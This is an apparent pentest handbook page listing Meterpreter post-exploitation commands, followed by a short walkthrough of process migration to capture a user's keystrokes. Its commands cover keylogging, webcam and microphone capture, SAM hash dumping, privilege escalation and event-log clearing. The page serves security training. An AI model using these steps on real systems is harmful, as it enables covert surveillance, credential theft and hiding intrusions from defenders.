handbook/tools/4.Exploitation/Metasploit/Commands/2.Meterpreter.md

74 lines
4.1 KiB
Markdown
Raw Normal View History

2024-08-30 23:07:22 +00:00
## Top Commands
**Meterpreter Commands**
```Terminal
sessions -u NUMBER ---> Turn Shell into Meterpreter session
run ---> Executes a Meterpreter script or Post module
sessions ---> Quickly switch to another session
migrate ---> Allows you to migrate Meterpreter to another process
background ---> Backgrounds the current session
exit ---> Terminate the Meterpreter session
help ---> Displays the help menu
info ---> Displays information about a Post module
irb ---> Opens an interactive Ruby shell on the current session
load ---> Loads one or more Meterpreter extensions
#Networking commands
arp ---> Displays the host ARP (Address Resolution Protocol) cache
ifconfig ---> Displays network interfaces available on the target system
netstat ---> Displays the network connections
portfwd ---> Forwards a local port to a remote service
route ---> Allows you to view and modify the routing table
resolve X_Y ---> Check DNS of local network to find a host IP
#System commands
clearev ---> Clears the event logs
execute ---> Executes a command
getpid ---> Shows the current process identifier
getuid ---> Shows the user that Meterpreter is running as
kill ---> Terminates a process
pkill ---> Terminates processes by name
ps ---> Lists running processes
reboot ---> Reboots the remote computer
shell ---> Drops into a system command shell
shutdown ---> Shuts down the remote computer
sysinfo ---> Gets information about the remote system, such as OS
#Others Commands (Listed under different menu categories in the help section)
idletime ---> Returns the number of seconds the remote user has been idle
keyscan_dump ---> Dumps the keystroke buffer
keyscan_start ---> Starts capturing keystrokes
keyscan_stop ---> Stops capturing keystrokes
screenshare ---> Allows you to watch the remote user's desktop in real time
screenshot ---> Grabs a screenshot of the interactive desktop
record_mic ---> Records audio from the default microphone for X seconds
webcam_chat ---> Starts a video chat
webcam_list ---> Lists webcams
webcam_snap ---> Takes a snapshot from the specified webcam
webcam_stream ---> Plays a video stream from the specified webcam
getsystem ---> Attempts to elevate your privilege to that of local system
hashdump ---> Dumps the contents of the SAM database
```
- Meterpreter Migration Shell
Migrating to another process will help Meterpreter interact with it. For example, if you see a word processor running on the target (e.g. word.exe, notepad.exe, etc.), you can migrate to it and start capturing keystrokes sent by the user to this process. Some Meterpreter versions will offer you the `keyscan_start`, `keyscan_stop`, and `keyscan_dump` command options to make Meterpreter act like a keylogger. Migrating to another process may also help you to have a more stable Meterpreter session. If you migrate in process id of browser, it might even be possible to inject elements in the web page.
To migrate the session, you can use the `migrate` command and specify the PID of the target process. For example, if you wanted to migrate the session to the process with PID 1234, you would use the following command:
The migrate command
```shell-session
- meterpreter > migrate 1234
[*] Migrating from 1304 to 1234...
[*] Migration completed successfully.
meterpreter >
```
When you migrate the session to a different process, the payload is injected into the target process and begins executing within its context. This means that the payload is now running within the same process as the target process, and has the same privileges and access to resources as the target process. We can think about this has both PID that fuse together!
Be careful; you may lose your user privileges if you migrate from a higher privileged (e.g. SYSTEM) user to a process started by a lower privileged user (e.g. webserver). You may not be able to gain them back.